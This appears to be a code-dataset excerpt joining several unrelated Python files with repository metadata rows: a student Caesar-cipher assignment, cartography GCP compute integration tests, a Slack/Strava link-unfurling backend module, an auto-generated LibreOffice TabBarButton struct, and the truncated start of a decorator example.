The dictionary should contain 62 keys of all the uppercase letters,
all the lowercase letters, and all numbers mapped to their shifted values.
input_shift: the amount by which to shift every letter of the
alphabet and every number (0 <= shift < 26)
decrypt: if the shift dict will be used for decrypting. affects digit shift function
Returns: a dictionary mapping letter/number (string) to
another letter/number (string).
'''
dig_shift = get_digit_shift(input_shift,decrypt)
#gets the new value for the shift in the digits
dict_shift = {}
for i in range(len(string.ascii_lowercase)):
if input_shift > 25:
new_input_shift = input_shift - 26
else:
new_input_shift = input_shift
if (i+new_input_shift) > 25:
t = (i+new_input_shift) - 26
dict_shift[string.ascii_lowercase[i]] = string.ascii_lowercase[t]
else:
dict_shift[string.ascii_lowercase[i]] = string.ascii_lowercase[i+new_input_shift]
for i in range(len(string.ascii_uppercase)):
if input_shift > 25:
new_input_shift = input_shift - 26
else:
new_input_shift = input_shift
if (i+new_input_shift) > 25:
t = (i+new_input_shift) - 26
dict_shift[string.ascii_uppercase[i]] = string.ascii_uppercase[t]
else:
dict_shift[string.ascii_uppercase[i]] = string.ascii_uppercase[i+new_input_shift]
for i in range(len(string.digits)):
if dig_shift > 19:
new_dig_shift = dig_shift - 20
elif dig_shift > 9:
new_dig_shift = dig_shift - 10
else:
new_dig_shift = dig_shift
if (i+new_dig_shift) > 9:
t = (i+new_dig_shift) - 10
dict_shift[string.digits[i]] = string.digits[t]
else:
dict_shift[string.digits[i]] = string.digits[i+new_dig_shift]
return dict_shift
def apply_shift(self, shift_dict):
'''
Applies the Caesar Cipher to self.message_text with the shift
specified in shift_dict. Creates a new string that is self.message_text,
shifted down by some number of characters, determined by the shift
value that shift_dict was built with.
shift_dict: a dictionary with 62 keys, mapping
lowercase and uppercase letters and numbers to their new letters
(as built by make_shift_dict)
Returns: the message text (string) with every letter/number shifted using
the input shift_dict
'''
new_str = ""
for i in self.get_message_text():
if str(i) in shift_dict:
#if str(i) is any of the keys in the dictionnary, then
#it shifted value will be added to new_str
new_str += shift_dict[str(i)]
else:
new_str += str(i)
#this is for when it is either punctuations or other symbols
#or spacesso that they are not modified as problem specified
return new_str
class PlaintextMessage(Message):
def __init__(self, input_text, input_shift):
'''
Initializes a PlaintextMessage object.
input_text (string): the message's text
input_shift: the shift associated with this message
A PlaintextMessage object inherits from Message. It has five attributes:
self.message_text (string, determined by input text)
self.valid_words (list, determined using helper function load_words)
self.shift (integer, determined by input shift)
self.encryption_dict (dictionary, built using the shift)
self.encrypted_message_text (string, encrypted using self.encryption_dict)
'''
Message.__init__(self,input_text)
self.shift = input_shift
self.encryption_dict = self.make_shift_dict(self.shift)
self.encrypted_message_text = self.apply_shift(self.encryption_dict)
def get_shift(self):
'''
Used to safely access self.shift outside of the class
Returns: self.shift
'''
return self.shift
def get_encryption_dict(self):
'''
Used to safely access a copy of self.encryption_dict outside of the class
Returns: a COPY of self.encryption_dict
'''
return self.encryption_dict.copy()
def get_encrypted_message_text(self):
'''
Used to safely access self.encrypted_message_text outside of the class
Returns: self.encrypted_message_text
'''
return self.encrypted_message_text
def modify_shift(self, input_shift):
'''
Changes self.shift of the PlaintextMessage, and updates any other
attributes that are determined by the shift.
input_shift: an integer, the new shift that should be associated with this message.
[0 <= shift < 26]
Returns: nothing
'''
self.__init__(self.message_text,input_shift)
self.shift = input_shift
class EncryptedMessage(Message):
def __init__(self, input_text):
'''
Initializes an EncryptedMessage object
input_text (string): the message's text
an EncryptedMessage object inherits from Message. It has two attributes:
self.message_text (string, determined by input text)
self.valid_words (list, determined using helper function load_words)
'''
Message.__init__(self,input_text)
def decrypt_message(self):
'''
Decrypts self.message_text by trying every possible shift value and
finding the "best" one.
We will define "best" as the shift that creates the max number of
valid English words when we use apply_shift(shift) on the message text.
If a is the original shift value used to encrypt the message, then
we would expect (26 - a) to be the value found for decrypting it.
Note: if shifts are equally good, such that they all create the
max number of valid words, you may choose any of those shifts
(and their corresponding decrypted messages) to return.
Returns: a tuple of the best shift value used to originally encrypt
the message (a) and the decrypted message text using that shift value
'''
input_scores = {}
#this will be a dictionnary with the different shifts as the keys
#and the values of these keys will be a tupple of the respective
#amount (score) of valid words found after applying this shift and the text
#with this applied shift
list_scores = []
list_tuples = []
#use of list for the tuples of best_shift and text as there can be
#many of these
for i in range(26):
#use of range 26 as that is the max
t = 0
#use of t as a counter for the amount of valid words in the
#decrypted text
shift_dict = self.make_shift_dict(26 - i, True).copy()
shift_text = self.apply_shift(shift_dict)
valid_words_list = self.valid_words.copy()
for b in valid_words_list:
if b in shift_text.lower():
t += 1
input_scores[i] = (t,shift_text)
list_scores.append(t)
for i in input_scores:
if input_scores[i][0] == max(list_scores):
list_tuples.append((i,input_scores[i][1]))
import random
if len(list_tuples) > 0:
return random.choice(list_tuples)
else:
return list_tuples[0]
#return the 0 index because it is the only value, and if
# all of them have the same score, as problem stated, any can be
#can be returneed so use of random module to choose
def test_plaintext_message():
'''
Write two test cases for the PlaintextMessage class here.
Each one should handle different cases (see handout for
more details.) Write a comment above each test explaining what
case(s) it is testing.
'''
#Testing for numbers
plaintext1 = PlaintextMessage("231.45", 2)
print('Expected Output: 453.67')
print('Actual Output:', plaintext1.get_encrypted_message_text())
#Testing for Capitals and numbers
plaintext1 = PlaintextMessage("HeLLo 23.21", 3)
print('Expected Output: KhOOr 56.54')
print('Actual Output:', plaintext1.get_encrypted_message_text())
# #### Example test case (PlaintextMessage) #####
# #This test is checking encoding a lowercase string with punctuation in it.
# plaintext = PlaintextMessage('hello!', 2)
# print('Expected Output: jgnnq!')
# print('Actual Output:', plaintext.get_encrypted_message_text())
def test_encrypted_message():
'''
Write two test cases for the EncryptedMessage class here.
Each one should handle different cases (see handout for
more details.) Write a comment above each test explaining what
case(s) it is testing.
'''
# #### Example test case (EncryptedMessage) #####
# # This test is checking decoding a lowercase string with punctuation in it.
# encrypted = EncryptedMessage('jgnnq!')
# print('Expected Output:', (2, 'hello!'))
# print('Actual Output:', encrypted.decrypt_message())
#Testing for Capital Letters and lowercase
encrypted1 = EncryptedMessage('EQORwVGT')
print('Expected Output:', (2, 'COMPuTER'))
print('Actual Output:', encrypted1.decrypt_message())
#Testing for Capitals,letters,punctuation and numbers
encrypted2 = EncryptedMessage('Jgnnq42!')
print('Expected Output:', (2, 'Hello21!'))
print('Actual Output:', encrypted2.decrypt_message())
def decode_story():
'''
Write your code here to decode the story contained in the file story.txt.
Hint: use the helper function get_story_string and your EncryptedMessage class.
Returns: a tuple containing (best_shift, decoded_story)
'''
encrypted = EncryptedMessage(get_story_string())
return encrypted.decrypt_message()
if __name__ == '__main__':
# Uncomment these lines to try running your test cases
test_plaintext_message()
test_encrypted_message()
# Uncomment these lines to try running decode_story_string()
best_shift, story = decode_story()
print("Best shift:", best_shift)
print("Decoded story: ", story)
| 36.214646 | 98 | 0.619064 | 9,738 | 0.679032 | 0 | 0 | 0 | 0 | 0 | 0 | 8,498 | 0.592567 |
1fbe01d48c418a25dac0b1a8cdfdd4ff5a631b60
| 13,996 |
py
|
Python
|
tests/integration/cartography/intel/gcp/test_compute.py
|
sckevmit/cartography
|
fefb63b5ec97986dcc29038331d0e5b027b95d5f
|
[
"Apache-2.0"
] | 2,322 |
2019-03-02T01:07:20.000Z
|
2022-03-31T20:39:12.000Z
|
tests/integration/cartography/intel/gcp/test_compute.py
|
sckevmit/cartography
|
fefb63b5ec97986dcc29038331d0e5b027b95d5f
|
[
"Apache-2.0"
] | 462 |
2019-03-07T18:38:11.000Z
|
2022-03-31T14:55:20.000Z
|
tests/integration/cartography/intel/gcp/test_compute.py
|
sckevmit/cartography
|
fefb63b5ec97986dcc29038331d0e5b027b95d5f
|
[
"Apache-2.0"
] | 246 |
2019-03-03T02:39:23.000Z
|
2022-02-24T09:46:38.000Z
|
import cartography.intel.gcp.compute
import tests.data.gcp.compute
TEST_UPDATE_TAG = 123456789
def _ensure_local_neo4j_has_test_instance_data(neo4j_session):
cartography.intel.gcp.compute.load_gcp_instances(
neo4j_session,
tests.data.gcp.compute.TRANSFORMED_GCP_INSTANCES,
TEST_UPDATE_TAG,
)
def _ensure_local_neo4j_has_test_vpc_data(neo4j_session):
cartography.intel.gcp.compute.load_gcp_vpcs(
neo4j_session,
tests.data.gcp.compute.TRANSFORMED_GCP_VPCS,
TEST_UPDATE_TAG,
)
def _ensure_local_neo4j_has_test_subnet_data(neo4j_session):
cartography.intel.gcp.compute.load_gcp_subnets(
neo4j_session,
tests.data.gcp.compute.TRANSFORMED_GCP_SUBNETS,
TEST_UPDATE_TAG,
)
def _ensure_local_neo4j_has_test_firewall_data(neo4j_session):
cartography.intel.gcp.compute.load_gcp_ingress_firewalls(
neo4j_session,
tests.data.gcp.compute.TRANSFORMED_FW_LIST,
TEST_UPDATE_TAG,
)
def test_transform_and_load_vpcs(neo4j_session):
"""
Test that we can correctly transform and load VPC nodes to Neo4j.
"""
vpc_res = tests.data.gcp.compute.VPC_RESPONSE
vpc_list = cartography.intel.gcp.compute.transform_gcp_vpcs(vpc_res)
cartography.intel.gcp.compute.load_gcp_vpcs(neo4j_session, vpc_list, TEST_UPDATE_TAG)
query = """
MATCH(vpc:GCPVpc{id:{VpcId}})
RETURN vpc.id, vpc.partial_uri, vpc.auto_create_subnetworks
"""
expected_vpc_id = 'projects/project-abc/global/networks/default'
nodes = neo4j_session.run(
query,
VpcId=expected_vpc_id,
)
actual_nodes = {(n['vpc.id'], n['vpc.partial_uri'], n['vpc.auto_create_subnetworks']) for n in nodes}
expected_nodes = {
(expected_vpc_id, expected_vpc_id, True),
}
assert actual_nodes == expected_nodes
def test_transform_and_load_subnets(neo4j_session):
"""
Ensure we can transform and load subnets.
"""
subnet_res = tests.data.gcp.compute.VPC_SUBNET_RESPONSE
subnet_list = cartography.intel.gcp.compute.transform_gcp_subnets(subnet_res)
cartography.intel.gcp.compute.load_gcp_subnets(neo4j_session, subnet_list, TEST_UPDATE_TAG)
query = """
MATCH(subnet:GCPSubnet)
RETURN subnet.id, subnet.region, subnet.gateway_address, subnet.ip_cidr_range, subnet.private_ip_google_access,
subnet.vpc_partial_uri
"""
nodes = neo4j_session.run(query)
actual_nodes = {
(
n['subnet.id'],
n['subnet.region'],
n['subnet.gateway_address'],
n['subnet.ip_cidr_range'],
n['subnet.private_ip_google_access'],
n['subnet.vpc_partial_uri'],
) for n in nodes
}
expected_nodes = {
(
'projects/project-abc/regions/europe-west2/subnetworks/default',
'europe-west2',
'10.0.0.1',
'10.0.0.0/20',
False,
'projects/project-abc/global/networks/default',
),
}
assert actual_nodes == expected_nodes
def test_transform_and_load_gcp_forwarding_rules(neo4j_session):
"""
Ensure that we can correctly transform and load GCP Forwarding Rules
"""
fwd_res = tests.data.gcp.compute.LIST_FORWARDING_RULES_RESPONSE
fwd_list = cartography.intel.gcp.compute.transform_gcp_forwarding_rules(fwd_res)
cartography.intel.gcp.compute.load_gcp_forwarding_rules(neo4j_session, fwd_list, TEST_UPDATE_TAG)
fwd_query = """
MATCH(f:GCPForwardingRule)
RETURN f.id, f.partial_uri, f.ip_address, f.ip_protocol, f.load_balancing_scheme, f.name, f.network, f.port_range,
f.ports, f.project_id, f.region, f.self_link, f.subnetwork, f.target
"""
objects = neo4j_session.run(fwd_query)
actual_nodes = {
(
o['f.id'],
o['f.ip_address'],
o['f.ip_protocol'],
o['f.load_balancing_scheme'],
o['f.name'],
o.get('f.port_range', None),
','.join(o.get('f.ports', None)) if o.get('f.ports', None) else None,
o['f.project_id'],
o['f.region'],
o['f.target'],
) for o in objects
}
expected_nodes = {
(
'projects/project-abc/regions/europe-west2/forwardingRules/internal-service-1111',
'10.0.0.10',
'TCP',
'INTERNAL',
'internal-service-1111',
None,
'80',
'project-abc',
'europe-west2',
'projects/project-abc/regions/europe-west2/targetPools/node-pool-12345',
),
(
'projects/project-abc/regions/europe-west2/forwardingRules/public-ingress-controller-1234567',
'1.2.3.11',
'TCP',
'EXTERNAL',
'public-ingress-controller-1234567',
'80-443',
None,
'project-abc',
'europe-west2',
'projects/project-abc/regions/europe-west2/targetVpnGateways/vpn-12345',
),
(
'projects/project-abc/regions/europe-west2/forwardingRules/shard-server-22222',
'10.0.0.20',
'TCP',
'INTERNAL',
'shard-server-22222',
None,
'10203',
'project-abc',
'europe-west2',
'projects/project-abc/regions/europe-west2/targetPools/node-pool-234567',
),
}
assert actual_nodes == expected_nodes
def test_transform_and_load_gcp_instances_and_nics(neo4j_session):
"""
Ensure that we can correctly transform and load GCP instances.
"""
instance_responses = [tests.data.gcp.compute.GCP_LIST_INSTANCES_RESPONSE]
instance_list = cartography.intel.gcp.compute.transform_gcp_instances(instance_responses)
cartography.intel.gcp.compute.load_gcp_instances(neo4j_session, instance_list, TEST_UPDATE_TAG)
instance_id1 = 'projects/project-abc/zones/europe-west2-b/instances/instance-1-test'
instance_id2 = 'projects/project-abc/zones/europe-west2-b/instances/instance-1'
nic_query = """
MATCH(i:GCPInstance)-[r:NETWORK_INTERFACE]->(nic:GCPNetworkInterface)
OPTIONAL MATCH (i)-[:TAGGED]->(t:GCPNetworkTag)
RETURN i.id, i.zone_name, i.project_id, i.hostname, t.value, r.lastupdated, nic.nic_id, nic.private_ip
"""
objects = neo4j_session.run(nic_query)
actual_nodes = {
(
o['i.id'],
o['i.zone_name'],
o['i.project_id'],
o['nic.nic_id'],
o['nic.private_ip'],
o['t.value'],
o['r.lastupdated'],
) for o in objects
}
expected_nodes = {
(
instance_id1,
'europe-west2-b',
'project-abc',
'projects/project-abc/zones/europe-west2-b/instances/instance-1-test/networkinterfaces/nic0',
'10.0.0.3',
None,
TEST_UPDATE_TAG,
),
(
instance_id2,
'europe-west2-b',
'project-abc',
'projects/project-abc/zones/europe-west2-b/instances/instance-1/networkinterfaces/nic0',
'10.0.0.2',
'test',
TEST_UPDATE_TAG,
),
}
assert actual_nodes == expected_nodes
def test_transform_and_load_firewalls(neo4j_session):
"""
Ensure we can correctly transform and load GCP firewalls
:param neo4j_session:
:return:
"""
fw_list = cartography.intel.gcp.compute.transform_gcp_firewall(tests.data.gcp.compute.LIST_FIREWALLS_RESPONSE)
cartography.intel.gcp.compute.load_gcp_ingress_firewalls(neo4j_session, fw_list, TEST_UPDATE_TAG)
query = """
MATCH (vpc:GCPVpc)-[r:RESOURCE]->(fw:GCPFirewall)
return vpc.id, fw.id, fw.has_target_service_accounts
"""
nodes = neo4j_session.run(query)
actual_nodes = {
(
(
n['vpc.id'],
n['fw.id'],
n['fw.has_target_service_accounts'],
)
) for n in nodes
}
expected_nodes = {
(
'projects/project-abc/global/networks/default',
'projects/project-abc/global/firewalls/default-allow-icmp',
False,
),
(
'projects/project-abc/global/networks/default',
'projects/project-abc/global/firewalls/default-allow-internal',
False,
),
(
'projects/project-abc/global/networks/default',
'projects/project-abc/global/firewalls/default-allow-rdp',
False,
),
(
'projects/project-abc/global/networks/default',
'projects/project-abc/global/firewalls/default-allow-ssh',
False,
),
(
'projects/project-abc/global/networks/default',
'projects/project-abc/global/firewalls/custom-port-incoming',
False,
),
}
assert actual_nodes == expected_nodes
def test_vpc_to_subnets(neo4j_session):
"""
Ensure that subnets are connected to VPCs.
"""
_ensure_local_neo4j_has_test_vpc_data(neo4j_session)
_ensure_local_neo4j_has_test_subnet_data(neo4j_session)
query = """
MATCH(vpc:GCPVpc{id:{VpcId}})-[:RESOURCE]->(subnet:GCPSubnet)
RETURN vpc.id, subnet.id, subnet.region, subnet.gateway_address, subnet.ip_cidr_range,
subnet.private_ip_google_access
"""
expected_vpc_id = 'projects/project-abc/global/networks/default'
nodes = neo4j_session.run(
query,
VpcId=expected_vpc_id,
)
actual_nodes = {
(
n['vpc.id'],
n['subnet.id'],
n['subnet.region'],
n['subnet.gateway_address'],
n['subnet.ip_cidr_range'],
n['subnet.private_ip_google_access'],
) for n in nodes
}
expected_nodes = {
(
'projects/project-abc/global/networks/default',
'projects/project-abc/regions/europe-west2/subnetworks/default',
'europe-west2',
'10.0.0.1',
'10.0.0.0/20',
False,
),
}
assert actual_nodes == expected_nodes
def test_nics_to_access_configs(neo4j_session):
"""
Ensure that network interfaces and access configs are attached
"""
_ensure_local_neo4j_has_test_instance_data(neo4j_session)
ac_query = """
MATCH (nic:GCPNetworkInterface)-[r:RESOURCE]->(ac:GCPNicAccessConfig)
return nic.nic_id, ac.access_config_id, ac.public_ip
"""
nodes = neo4j_session.run(ac_query)
nic_id1 = 'projects/project-abc/zones/europe-west2-b/instances/instance-1-test/networkinterfaces/nic0'
ac_id1 = f"{nic_id1}/accessconfigs/ONE_TO_ONE_NAT"
nic_id2 = 'projects/project-abc/zones/europe-west2-b/instances/instance-1/networkinterfaces/nic0'
ac_id2 = f"{nic_id2}/accessconfigs/ONE_TO_ONE_NAT"
actual_nodes = {(n['nic.nic_id'], n['ac.access_config_id'], n['ac.public_ip']) for n in nodes}
expected_nodes = {
(nic_id1, ac_id1, '1.3.4.5'),
(nic_id2, ac_id2, '1.2.3.4'),
}
assert actual_nodes == expected_nodes
def test_nic_to_subnets(neo4j_session):
"""
Ensure that network interfaces are attached to subnets
"""
_ensure_local_neo4j_has_test_subnet_data(neo4j_session)
_ensure_local_neo4j_has_test_instance_data(neo4j_session)
subnet_query = """
MATCH (nic:GCPNetworkInterface{id:{NicId}})-[:PART_OF_SUBNET]->(subnet:GCPSubnet)
return nic.nic_id, nic.private_ip, subnet.id, subnet.gateway_address, subnet.ip_cidr_range
"""
nodes = neo4j_session.run(
subnet_query,
NicId='projects/project-abc/zones/europe-west2-b/instances/instance-1-test/networkinterfaces/nic0',
)
actual_nodes = {
(
n['nic.nic_id'],
n['nic.private_ip'],
n['subnet.id'],
n['subnet.gateway_address'],
n['subnet.ip_cidr_range'],
) for n in nodes
}
expected_nodes = {(
'projects/project-abc/zones/europe-west2-b/instances/instance-1-test/networkinterfaces/nic0',
'10.0.0.3',
'projects/project-abc/regions/europe-west2/subnetworks/default',
'10.0.0.1',
'10.0.0.0/20',
)}
assert actual_nodes == expected_nodes
def test_instance_to_vpc(neo4j_session):
_ensure_local_neo4j_has_test_vpc_data(neo4j_session)
_ensure_local_neo4j_has_test_subnet_data(neo4j_session)
_ensure_local_neo4j_has_test_instance_data(neo4j_session)
instance_id1 = 'projects/project-abc/zones/europe-west2-b/instances/instance-1-test'
query = """
MATCH (i:GCPInstance{id:{InstanceId}})-[r:MEMBER_OF_GCP_VPC]->(v:GCPVpc)
RETURN i.id, v.id
"""
nodes = neo4j_session.run(
query,
InstanceId=instance_id1,
)
actual_nodes = {
(
n['i.id'],
n['v.id'],
) for n in nodes
}
expected_nodes = {(
instance_id1,
'projects/project-abc/global/networks/default',
)}
assert actual_nodes == expected_nodes
def test_vpc_to_firewall_to_iprule_to_iprange(neo4j_session):
_ensure_local_neo4j_has_test_vpc_data(neo4j_session)
_ensure_local_neo4j_has_test_firewall_data(neo4j_session)
query = """
MATCH (rng:IpRange{id:'0.0.0.0/0'})-[m:MEMBER_OF_IP_RULE]->(rule:IpRule{fromport:22})
-[a:ALLOWED_BY]->(fw:GCPFirewall)<-[r:RESOURCE]-(vpc:GCPVpc)
RETURN rng.id, rule.id, fw.id, fw.priority, vpc.id
"""
nodes = neo4j_session.run(query)
actual_nodes = {
(
n['rng.id'],
n['rule.id'],
n['fw.id'],
n['vpc.id'],
) for n in nodes
}
expected_nodes = {(
'0.0.0.0/0',
'projects/project-abc/global/firewalls/default-allow-ssh/allow/22tcp',
'projects/project-abc/global/firewalls/default-allow-ssh',
'projects/project-abc/global/networks/default',
)}
assert actual_nodes == expected_nodes
| 32.85446 | 118 | 0.627894 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6,007 | 0.429194 |
1fc21aa494251b943ab4e4b535ca093a791a6af8
| 6,208 |
py
|
Python
|
gae/backend/services/slack/slack.py
|
jlapenna/bikebuds
|
6e2b54fa2e4fa03e5ff250ca779c269ccc49a2d8
|
[
"Apache-2.0"
] | 9 |
2018-11-17T00:53:47.000Z
|
2021-03-16T05:18:01.000Z
|
gae/backend/services/slack/slack.py
|
jlapenna/bikebuds
|
6e2b54fa2e4fa03e5ff250ca779c269ccc49a2d8
|
[
"Apache-2.0"
] | 8 |
2018-11-28T17:19:07.000Z
|
2022-02-26T17:46:09.000Z
|
gae/backend/services/slack/slack.py
|
jlapenna/bikebuds
|
6e2b54fa2e4fa03e5ff250ca779c269ccc49a2d8
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import re
import urllib
import urllib.request
import flask
from google.cloud.datastore.entity import Entity
from slack_sdk import WebClient
from slack_sdk.errors import SlackApiError
from shared import responses
from shared import task_util
from shared.datastore.bot import Bot
from shared.datastore.service import Service
from shared.services.slack.installation_store import DatastoreInstallationStore
from shared.services.strava.client import ClientWrapper
from services.slack.track_blocks import create_track_blocks
from services.slack.unfurl_activity import unfurl_activity
from services.slack.unfurl_route import unfurl_route
from shared import ds_util
from shared.config import config
_STRAVA_APP_LINK_REGEX = re.compile('(https://www.strava.com/([^/]+)/[0-9]+)')
_TRACKS_TEAM_ID = 'T01U8EC3H8T'
_TRACKS_CHANNEL_ID = 'C020755FX3L'
_DEV_TRACKS_TEAM_ID = 'T01U4PCGSQM'
_DEV_TRACKS_CHANNEL_ID = 'C01U82F2STD'
module = flask.Blueprint('slack', __name__)
@module.route('/tasks/event', methods=['POST'])
def tasks_event():
params = task_util.get_payload(flask.request)
event = params['event']
logging.info('SlackEvent: %s', event.key)
if event['event']['type'] == 'link_shared':
return _process_link_shared(event)
return responses.OK_SUB_EVENT_UNKNOWN
@module.route('/tasks/livetrack', methods=['POST'])
def tasks_livetrack():
params = task_util.get_payload(flask.request)
track = params['track']
logging.info('process/livetrack: %s', track)
return _process_track(track)
def _process_link_shared(event):
slack_client = _create_slack_client(event)
unfurls = _create_unfurls(event)
if not unfurls:
return responses.OK_NO_UNFURLS
try:
response = slack_client.chat_unfurl(
channel=event['event']['channel'],
ts=event['event']['message_ts'],
unfurls=unfurls,
)
except SlackApiError:
logging.exception('process_link_shared: failed: unfurling: %s', unfurls)
return responses.INTERNAL_SERVER_ERROR
if not response['ok']:
logging.error('process_link_shared: failed: %s with %s', response, unfurls)
return responses.INTERNAL_SERVER_ERROR
logging.debug('process_link_shared: %s', response)
return responses.OK
def _create_slack_client(event):
slack_service = Service.get('slack', parent=Bot.key())
installation_store = DatastoreInstallationStore(
ds_util.client, parent=slack_service.key
)
slack_bot = installation_store.find_bot(
enterprise_id=event.get('authorizations', [{}])[0].get('enterprise_id'),
team_id=event.get('authorizations', [{}])[0].get('team_id'),
is_enterprise_install=event.get('authorizations', [{}])[0].get(
'is_enterprise_install'
),
)
return WebClient(slack_bot.bot_token)
def _create_slack_client_for_team(team_id):
slack_service = Service.get('slack', parent=Bot.key())
installation_store = DatastoreInstallationStore(
ds_util.client, parent=slack_service.key
)
slack_bot = installation_store.find_bot(
enterprise_id=None,
team_id=team_id,
is_enterprise_install=False,
)
return WebClient(slack_bot.bot_token)
def _create_unfurls(event):
strava = Service.get('strava', parent=Bot.key())
strava_client = ClientWrapper(strava)
unfurls = {}
for link in event['event']['links']:
alt_url = _resolve_rewrite_link(link)
unfurl = _unfurl(strava_client, link, alt_url)
if unfurl:
unfurls[link['url']] = unfurl
logging.warning(f'_create_unfurls: {unfurls}')
return unfurls
def _resolve_rewrite_link(link):
if 'strava.app.link' not in link['url']:
return
try:
logging.info('_resolve_rewrite_link: fetching: %s', link['url'])
with urllib.request.urlopen(link['url']) as response:
contents = response.read()
logging.debug('_resolve_rewrite_link: fetched: %s', link['url'])
except urllib.request.HTTPError:
logging.exception('Could not fetch %s', link['url'])
return
match = _STRAVA_APP_LINK_REGEX.search(str(contents))
if match is None:
logging.warning('Could not resolve %s', link['url'])
return
resolved_url = match.group()
return resolved_url
def _unfurl(strava_client, link, alt_url=None):
url = alt_url if alt_url else link['url']
if '/routes/' in url:
return unfurl_route(strava_client, url)
elif '/activities/' in url:
return unfurl_activity(strava_client, url)
else:
return None
def _process_track(track: Entity) -> responses.Response:
if config.is_dev:
team_id = _DEV_TRACKS_TEAM_ID
channel_id = _DEV_TRACKS_CHANNEL_ID
else:
team_id = _TRACKS_TEAM_ID
channel_id = _TRACKS_CHANNEL_ID
slack_client = _create_slack_client_for_team(team_id)
blocks = create_track_blocks(track)
if not blocks:
return responses.OK_INVALID_LIVETRACK
try:
response = slack_client.chat_postMessage(
channel=channel_id, blocks=blocks, unfurl_links=False, unfurl_media=False
)
except SlackApiError:
logging.exception(f'process_track: failed: track: {track}, blocks: {blocks}')
return responses.INTERNAL_SERVER_ERROR
if not response['ok']:
logging.error(
f'process_track: failed: response: {response}, track: {track}, blocks: {blocks}'
)
return responses.INTERNAL_SERVER_ERROR
logging.debug('process_track: %s', response)
return responses.OK
| 32.846561 | 92 | 0.704897 | 0 | 0 | 0 | 0 | 557 | 0.089723 | 0 | 0 | 1,451 | 0.233731 |
1fc244ac9c29079630ffd294e5609b1a6c46e1ff
| 3,895 |
py
|
Python
|
ooobuild/lo/drawing/framework/tab_bar_button.py
|
Amourspirit/ooo_uno_tmpl
|
64e0c86fd68f24794acc22d63d8d32ae05dd12b8
|
[
"Apache-2.0"
] | null | null | null |
ooobuild/lo/drawing/framework/tab_bar_button.py
|
Amourspirit/ooo_uno_tmpl
|
64e0c86fd68f24794acc22d63d8d32ae05dd12b8
|
[
"Apache-2.0"
] | null | null | null |
ooobuild/lo/drawing/framework/tab_bar_button.py
|
Amourspirit/ooo_uno_tmpl
|
64e0c86fd68f24794acc22d63d8d32ae05dd12b8
|
[
"Apache-2.0"
] | null | null | null |
# coding: utf-8
#
# Copyright 2022 :Barry-Thomas-Paul: Moss
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http: // www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Struct Class
# this is a auto generated file generated by Cheetah
# Namespace: com.sun.star.drawing.framework
# Libre Office Version: 7.3
from ooo.oenv.env_const import UNO_NONE
import typing
from .x_resource_id import XResourceId as XResourceId_5be3103d
class TabBarButton(object):
"""
Struct Class
Descriptor of a tab bar button.
Tab bar buttons are typically used to offer the user the choice between different views to be displayed in one pane.
For identification only the ResourceId is used, so for some methods of the XTabBar interface only the ResourceId member is evaluated.
See Also:
`API TabBarButton <https://api.libreoffice.org/docs/idl/ref/structcom_1_1sun_1_1star_1_1drawing_1_1framework_1_1TabBarButton.html>`_
"""
__ooo_ns__: str = 'com.sun.star.drawing.framework'
__ooo_full_ns__: str = 'com.sun.star.drawing.framework.TabBarButton'
__ooo_type_name__: str = 'struct'
typeName: str = 'com.sun.star.drawing.framework.TabBarButton'
"""Literal Constant ``com.sun.star.drawing.framework.TabBarButton``"""
def __init__(self, ButtonLabel: typing.Optional[str] = '', HelpText: typing.Optional[str] = '', ResourceId: typing.Optional[XResourceId_5be3103d] = None) -> None:
"""
Constructor
Arguments:
ButtonLabel (str, optional): ButtonLabel value.
HelpText (str, optional): HelpText value.
ResourceId (XResourceId, optional): ResourceId value.
"""
super().__init__()
if isinstance(ButtonLabel, TabBarButton):
oth: TabBarButton = ButtonLabel
self.ButtonLabel = oth.ButtonLabel
self.HelpText = oth.HelpText
self.ResourceId = oth.ResourceId
return
kargs = {
"ButtonLabel": ButtonLabel,
"HelpText": HelpText,
"ResourceId": ResourceId,
}
self._init(**kargs)
def _init(self, **kwargs) -> None:
self._button_label = kwargs["ButtonLabel"]
self._help_text = kwargs["HelpText"]
self._resource_id = kwargs["ResourceId"]
@property
def ButtonLabel(self) -> str:
"""
This label is displayed on the UI as button text.
The label is expected to be localized.
"""
return self._button_label
@ButtonLabel.setter
def ButtonLabel(self, value: str) -> None:
self._button_label = value
@property
def HelpText(self) -> str:
"""
The localized help text that may be displayed in a tool tip.
"""
return self._help_text
@HelpText.setter
def HelpText(self, value: str) -> None:
self._help_text = value
@property
def ResourceId(self) -> XResourceId_5be3103d:
"""
XResourceId object of the resource that is requested to be displayed when the tab bar button is activated.
For some methods of the XTabBar interface only this member is evaluated. That is because only this member is used to identify a tab bar button.
"""
return self._resource_id
@ResourceId.setter
def ResourceId(self, value: XResourceId_5be3103d) -> None:
self._resource_id = value
__all__ = ['TabBarButton']
| 33.869565 | 166 | 0.668293 | 2,997 | 0.769448 | 0 | 0 | 1,079 | 0.277022 | 0 | 0 | 2,246 | 0.576637 |
1fc419f20f21c00b2f7e26ead5cc3549a10d6b37
| 662 |
py
|
Python
|
decorator/mark_with_args.py
|
levs72/pyneng-examples
|
d6288292dcf9d1ebc5a9db4a0d620bd11b4a2df9
|
[
"MIT"
] | 11 |
2021-04-05T09:30:23.000Z
|
2022-03-09T13:27:56.000Z
|
decorator/mark_with_args.py
|
levs72/pyneng-examples
|
d6288292dcf9d1ebc5a9db4a0d620bd11b4a2df9
|
[
"MIT"
] | null | null | null |
decorator/mark_with_args.py
|
levs72/pyneng-examples
|
d6288292dcf9d1ebc5a9db4a0d620bd11b4a2df9
|
[
"MIT"
] | 11 |
2021-04-06T03:44:35.000Z
|
2022-03-04T21:20:40.000Z
|
def mark(**kwargs):
print(f"Получил аргументы {kwargs}")
def decorator(func):
